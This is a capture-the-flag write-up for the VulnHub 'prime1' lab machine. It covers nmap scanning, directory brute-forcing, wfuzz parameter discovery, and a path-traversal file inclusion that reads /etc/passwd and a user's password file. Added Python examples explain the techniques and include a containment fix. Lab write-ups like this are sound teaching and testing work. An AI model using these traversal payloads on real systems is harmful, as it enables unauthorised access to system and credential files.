prime1 target machine pentest (information gathering, kernel privilege escalation)

Target information

VulnHub target machine

prime1

Host discovery

-sn means "no port scan" (nmap's ping sweep), not "scan and no port hack"
It is used purely to find live hosts. On a local segment nmap answers from ARP, which is why the MAC addresses appear below

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 02:25 EDT
Nmap scan report for 192.168.50.1
Host is up (0.00014s latency).
MAC Address: 00:50:56:F3:32:0E (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00012s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.153
Host is up (0.00011s latency).
MAC Address: 00:0C:29:5C:C7:58 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:F0:B2:27 (VMware)
Nmap scan report for 192.168.50.144
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.88 seconds

--min-rate 10000 -p- scans all 65535 TCP ports and tells nmap to send at least 10000 packets per second. That is fine on a lab network; on a real engagement such a rate drops packets and can miss open ports

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.153
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 02:27 EDT
Nmap scan report for bogon (192.168.50.153)
Host is up (0.00055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:5C:C7:58 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds

Detailed scan
-sT does a full TCP connect (complete three-way handshake), so it works without raw-socket privileges, but it is noisier than the -sS half-open scan: the completed connection reaches the application and gets logged. -sS is the quieter choice when running as root; on a lab box it makes no difference
-sV probes service versions
-O fingerprints the operating system
-p restricts the scan to the given ports

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -O -sV -p22,80 192.168.50.153  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 02:29 EDT
Nmap scan report for bogon (192.168.50.153)
Host is up (0.00025s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:5C:C7:58 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds

-sU is a UDP scan. After the TCP scan, sweep UDP as well; it usually turns up little. Note that reusing -p22,80 only checks those two UDP ports (both closed below); a more useful UDP pass targets the most common UDP services (nmap's --top-ports option) rather than the TCP port numbers

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O -sV -p22,80 192.168.50.153 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 02:41 EDT
Nmap scan report for bogon (192.168.50.153)
Host is up (0.00027s latency).

PORT   STATE  SERVICE VERSION
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:5C:C7:58 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.68 seconds

--script=vuln runs the NSE scripts in the vuln category; give it the open ports so it does not waste time on closed ones. A "Couldn't find any ..." line only means that script's checks found nothing, not that the class of bug is absent

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.50.153
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 02:44 EDT
Nmap scan report for bogon (192.168.50.153)
Host is up (0.00025s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: Wordpress login page.
MAC Address: 00:0C:29:5C:C7:58 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 68.75 seconds

Browse to http://192.168.50.153/
The page shows only an image (screenshot in the original post)

Directory brute-forcing

Tools
dirb
gobuster
feroxbuster

Using dirb

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.153

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Sep  9 03:01:50 2024
URL_BASE: http://192.168.50.153/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.50.153/ ----
+ http://192.168.50.153/dev (CODE:200|SIZE:131)
+ http://192.168.50.153/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.50.153/javascript/
+ http://192.168.50.153/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.50.153/wordpress/

---- Entering directory: http://192.168.50.153/javascript/ ----
==> DIRECTORY: http://192.168.50.153/javascript/jquery/

---- Entering directory: http://192.168.50.153/wordpress/ ----
+ http://192.168.50.153/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/
==> DIRECTORY: http://192.168.50.153/wordpress/wp-content/
==> DIRECTORY: http://192.168.50.153/wordpress/wp-includes/
+ http://192.168.50.153/wordpress/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.50.153/javascript/jquery/ ----
+ http://192.168.50.153/javascript/jquery/jquery (CODE:200|SIZE:284394)

---- Entering directory: http://192.168.50.153/wordpress/wp-admin/ ----
+ http://192.168.50.153/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/includes/
+ http://192.168.50.153/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/user/

---- Entering directory: http://192.168.50.153/wordpress/wp-content/ ----
+ http://192.168.50.153/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.50.153/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.50.153/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.50.153/wordpress/wp-content/uploads/

---- Entering directory: http://192.168.50.153/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.153/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.153/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.153/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.153/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.153/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.50.153/wordpress/wp-admin/network/ ----
+ http://192.168.50.153/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.50.153/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.50.153/wordpress/wp-admin/user/ ----
+ http://192.168.50.153/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.50.153/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.50.153/wordpress/wp-content/plugins/ ----
+ http://192.168.50.153/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.50.153/wordpress/wp-content/themes/ ----
+ http://192.168.50.153/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.50.153/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Sep  9 03:02:18 2024
DOWNLOADED: 46120 - FOUND: 15

/dev is the first path exposed
Fetch /dev with curl (sudo is not needed for curl; the output below is shown as it was run)

┌──(kali㉿kali)-[~]
└─$ sudo curl http://192.168.50.153/dev
[sudo] password for kali: 
hello,now you are at level 0 stage.In real life pentesting we should use our tools to dig on a web very hard.Happy hacking. 

Use -X to append extensions to every wordlist entry, here looking for .zip and .txt files

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.153 -X .zip,.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Sep  9 03:06:44 2024
URL_BASE: http://192.168.50.153/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.50.153/ ----
+ http://192.168.50.153/secret.txt (CODE:200|SIZE:412)

-----------------
END_TIME: Mon Sep  9 03:06:49 2024
DOWNLOADED: 9224 - FOUND: 1

See what secret.txt says

┌──(kali㉿kali)-[~]
└─$ sudo curl http://192.168.50.153/secret.txt  
Looks like you have got some secrets.Ok I just want to do some help to you. Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web//see the location.txt and you will get your next move//

The hint says to fuzz every .php page found, so first brute-force for .php files

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.153 -X .php

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Sep  9 03:11:39 2024
URL_BASE: http://192.168.50.153/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.50.153/ ----
+ http://192.168.50.153/image.php (CODE:200|SIZE:147)
+ http://192.168.50.153/index.php (CODE:200|SIZE:136)

-----------------
END_TIME: Mon Sep  9 03:11:42 2024
DOWNLOADED: 4612 - FOUND: 2

Fuzz image.php for parameter names with wfuzz
-c colours the output, -w sets the wordlist, and the --hh/--hc/--hw/--hl filters hide responses by character count, status code, word count or line count (the --sh/--sc/--sw/--sl forms show only matches). FUZZ marks where each wordlist entry is substituted. image.php's normal response is 147 bytes, so --hh 147 hides every response identical to the baseline; whatever is left is a name the page reacts to. Quote the URL in the shell when it contains ? or &, otherwise the shell may treat it as a glob

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 147 http://192.168.50.153/image.php?FUZZ=something
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.50.153/image.php?FUZZ=something
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================


Total time: 0
Processed Requests: 951
Filtered Requests: 951
Requests/sec.: 0

Every request was filtered, so nothing in the wordlist changes image.php. Fuzz index.php the same way (baseline 136 bytes): the name file produces a 206-byte response, which matches the hint about finding the right parameter

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.50.153/index.php?FUZZ=something
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.50.153/index.php?FUZZ=something
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000341:   200        7 L      19 W       206 Ch      "file"

Total time: 0.416232
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 2284.778
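The filter wfuzz applies with --hh above, written out as an added example (this is not code from the original post or from wfuzz). It fetches the page once with a junk name to get a baseline, then once per candidate name, and keeps the names whose response differs. The site it runs against is a constructed stand-in whose character counts mirror the post (index.php answers 136 bytes normally and 206 bytes for ?file, image.php always 147 bytes); http_fetch is the real-target variant and is assumed to be pointed at a base URL such as http://192.168.50.153/.

```python
# Added example: the baseline-diff logic behind wfuzz's --hh/--hw/--hl filters.
from typing import Callable, Dict, List, Tuple

Shape = Tuple[int, int, int]  # (lines, words, chars): wfuzz's L / W / Ch columns

# Constructed stand-in for the target. Key "" is the body returned for any
# parameter the page ignores; sizes mirror the post's wfuzz and dirb output.
_FAKE_SITE: Dict[str, Dict[str, str]] = {
    "index.php": {"": "x" * 136, "file": "x" * 206},
    "image.php": {"": "x" * 147},
}


def fake_fetch(page: str, param: str) -> str:
    """Body the constructed site returns for GET /page?param=something."""
    responses = _FAKE_SITE[page]
    return responses.get(param, responses[""])


def http_fetch(base_url: str) -> Callable[[str, str], str]:
    """Fetcher for a real target, e.g. http_fetch("http://192.168.50.153/")."""
    import urllib.parse
    import urllib.request

    def fetch(page: str, param: str) -> str:
        url = base_url + page + "?" + urllib.parse.urlencode({param: "something"})
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.read().decode("utf-8", "replace")

    return fetch


def response_shape(body: str) -> Shape:
    """Line, word and character counts, the three things wfuzz filters on."""
    return (body.count("\n"), len(body.split()), len(body))


def find_reactive_params(fetch: Callable[[str, str], str], page: str,
                         wordlist: List[str], hide_chars_only: bool = True) -> List[str]:
    """Names whose response differs from the junk-name baseline.

    hide_chars_only=True mimics `--hh <baseline chars>`. False hides a
    response only when lines, words and chars all match, which is stricter
    and is what you want when a page pads responses to a fixed length.
    """
    baseline = response_shape(fetch(page, "zzz_not_a_real_param"))
    hits: List[str] = []
    for name in wordlist:
        shape = response_shape(fetch(page, name))
        same = shape[2] == baseline[2] if hide_chars_only else shape == baseline
        if not same:
            hits.append(name)
    return hits
```

On a page whose size changes on every request (a nonce or timestamp in the body), filtering on character count hides nothing; that is when wfuzz's --hw or --hl, or the three-count comparison here, is the better filter.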

The response says we are digging the wrong file

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo curl http://192.168.50.153/index.php?file                                                                       
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>Do something better <br><br><br><br><br><br>you are digging wrong file</html>

Not entirely wrong, though: give the GET parameter file a value. secret.txt mentioned location.txt, so try that

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo curl http://192.168.50.153/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>

The hint is to use the parameter secrettier360 on another PHP page

Aside: scrot is a Kali screenshot tool, handy for keeping a record of the engagement
The screenshots can be viewed with xdg-open, which opens them in the default image viewer

Try this parameter on both PHP pages, index.php and image.php

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo curl http://192.168.50.153/index.php?secrettier360    
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body></html>

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo curl http://192.168.50.153/image.php?secrettier360
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>

image.php confirms this is the right parameter

Summary so far
Collected during information gathering:
secret.txt
location.txt (hints at the secrettier360 parameter)
index.php
image.php
GET parameter file
GET parameter secrettier360

File inclusion

There is no obvious next step. If image.php is doing a file inclusion, the value of secrettier360 would be the name of the file it includes, so try giving it a file name
The contents of secret.txt appear in the response after image.php's own output. Coincidence? Try other files to confirm it is a real local file inclusion (LFI)

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.50.153/image.php?secrettier360=secret.txt
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>Looks like you have got some secrets.Ok I just want to do some help to you. Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web//see the location.txt and you will get your next move//</html>
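What image.php is doing with secrettier360, and the check that would have stopped it, as an added example in Python (this is not the target's PHP and not code from the original post). The vulnerable function mirrors a naive include of a base directory concatenated with the parameter; the safe one resolves the path and insists it stays under the base. The web root is a temporary directory created for the demonstration, and the secret.txt placed in it is a constructed stand-in for the file the post found.

```python
# Added example: why "../" escapes the web root, and realpath containment as the fix.
import os
import tempfile
from typing import Optional


def traversal_payload(target: str, depth: int = 8) -> str:
    """Build the value used in the post: ../ repeated, then the target path.

    Once the traversal reaches / every further ../ stays at /, so using more
    than needed is harmless; too few leaves you inside the web root.
    """
    return "../" * depth + target.lstrip("/")


def vulnerable_resolve(base_dir: str, user_value: str) -> str:
    """Path a naive include(BASE . '/' . $_GET['secrettier360']) would open."""
    return os.path.normpath(base_dir + "/" + user_value)


def safe_resolve(base_dir: str, user_value: str) -> Optional[str]:
    """Hardened form: resolve symlinks and ../, then require the result to
    still sit under base_dir. Returns None for anything that escapes."""
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, user_value))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def looks_like_passwd(body: str) -> bool:
    """Marker check to confirm an inclusion really returned /etc/passwd."""
    return "root:x:0:0:" in body


def demo() -> dict:
    """Run both resolvers against the post's payload inside a throwaway web root."""
    payload = traversal_payload("/etc/passwd", depth=16)  # generous depth, see above
    with tempfile.TemporaryDirectory() as web_root:
        # constructed stand-in for the secret.txt the post found in the web root
        with open(os.path.join(web_root, "secret.txt"), "w") as f:
            f.write("Looks like you have got some secrets.")
        return {
            "vulnerable": vulnerable_resolve(web_root, payload),
            "safe_rejects_traversal": safe_resolve(web_root, payload) is None,
            "safe_allows_local": safe_resolve(web_root, "secret.txt")
            == os.path.join(os.path.realpath(web_root), "secret.txt"),
        }
```

The containment check is the whole fix: a denylist of "../" is bypassed by encoding tricks and symlinks, whereas comparing the resolved path against the resolved base does not care how the escape was spelled.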

Now include /etc/passwd with a ../ prefix. It works, so this is a local file inclusion. The extra ../ segments do no harm: once the path reaches / any further ../ stays at /
The saket user's GECOS (comment) field is interesting: it is a hint

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.50.153/image.php?secrettier360=../../../../../../../../etc/passwd
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>

Tips for reading /etc/passwd
Check the login shell: accounts with /bin/bash or another real shell are the first to look at. An empty shell field (as for saket above) is not "no shell": per passwd(5) it defaults to /bin/sh
Check the UID: 1000 and above are usually accounts created by a person (victor, saket here); below 1000 are usually system and service accounts
Check the GECOS comment field: it normally just repeats the name, and here it literally points at password.txt
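The three tips above as a small triage script, added here as an example (not code from the original post). SAMPLE is constructed from a few lines of the dump returned through the inclusion, HTML prefix and trailing tag included, so the parser also shows the clean-up such a dump needs; the ordering rule (more reasons first) is this example's own choice.

```python
# Added example: parse an /etc/passwd dump and rank the accounts worth a look.
from dataclasses import dataclass
from typing import List

# Constructed from the post's LFI output: first line still carries image.php's
# HTML, last line is the closing tag, saket's shell field is empty.
SAMPLE = """\
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>
"""

# shells that refuse an interactive login
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


@dataclass
class Account:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    @property
    def interactive(self) -> bool:
        return self.shell not in NON_LOGIN_SHELLS

    @property
    def human(self) -> bool:
        # uid 0 is root; 1000 and up is the Debian/Ubuntu range for created users
        return self.uid == 0 or self.uid >= 1000


def parse_passwd(text: str) -> List[Account]:
    accounts: List[Account] = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue  # not a passwd record (blank line, </html>, comment)
        name, _pw, uid, gid, gecos, home, shell = fields
        name = name.rsplit(">", 1)[-1]  # drop HTML glued to the first line of an LFI dump
        if not shell:
            shell = "/bin/sh"  # passwd(5): an empty shell field means /bin/sh
        accounts.append(Account(name, int(uid), int(gid), gecos, home, shell))
    return accounts


def triage_passwd(text: str) -> List[dict]:
    """Accounts worth a look, with the reasons, most reasons first."""
    findings = []
    for a in parse_passwd(text):
        if not (a.interactive or a.human):
            continue
        reasons = []
        if a.interactive:
            reasons.append("interactive shell " + a.shell)
        if a.human:
            reasons.append("uid %d" % a.uid)
        # GECOS normally just repeats the name; anything else deserves reading
        if a.human and a.gecos.rstrip(",") != a.name:
            reasons.append("gecos: " + a.gecos)
        findings.append({"user": a.name, "reasons": reasons})
    findings.sort(key=lambda f: -len(f["reasons"]))  # stable sort: ties keep file order
    return findings
```

Run against the sample, saket comes out on top with three reasons (a usable /bin/sh, a user-range UID and a GECOS field that is a sentence rather than a name), which is exactly the account the post follows next.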

Read /home/saket/password.txt through the same inclusion
Its content is follow_the_ippsec
This looks confusing at first, because the response still starts with "finaly you got the right parameter". That line is image.php's own output, printed before the included file; it is not saying follow_the_ippsec is a parameter

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.50.153/image.php?secrettier360=../../../../../../../../../../../../home/saket/password.txt
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>

Web admin backend

Directory brute-forcing showed that the target runs WordPress under /wordpress/, so its pages are reached through that path

Scan it with wpscan, a scanner built specifically for WordPress sites

Enumerate users: -e u enumerates users
Found the user victor

┌──(kali㉿kali)-[~]
└─$ sudo wpscan --url http://192.168.50.153/wordpress -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.50.153/wordpress/ [192.168.50.153]
[+] Started: Fri Sep 13 21:39:17 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.50.153/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.50.153/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.50.153/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.50.153/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.50.153/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
 |  - http://192.168.50.153/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)

 Brute Forcing Author IDs - Time: 00:00:00 <==========================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] victor
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

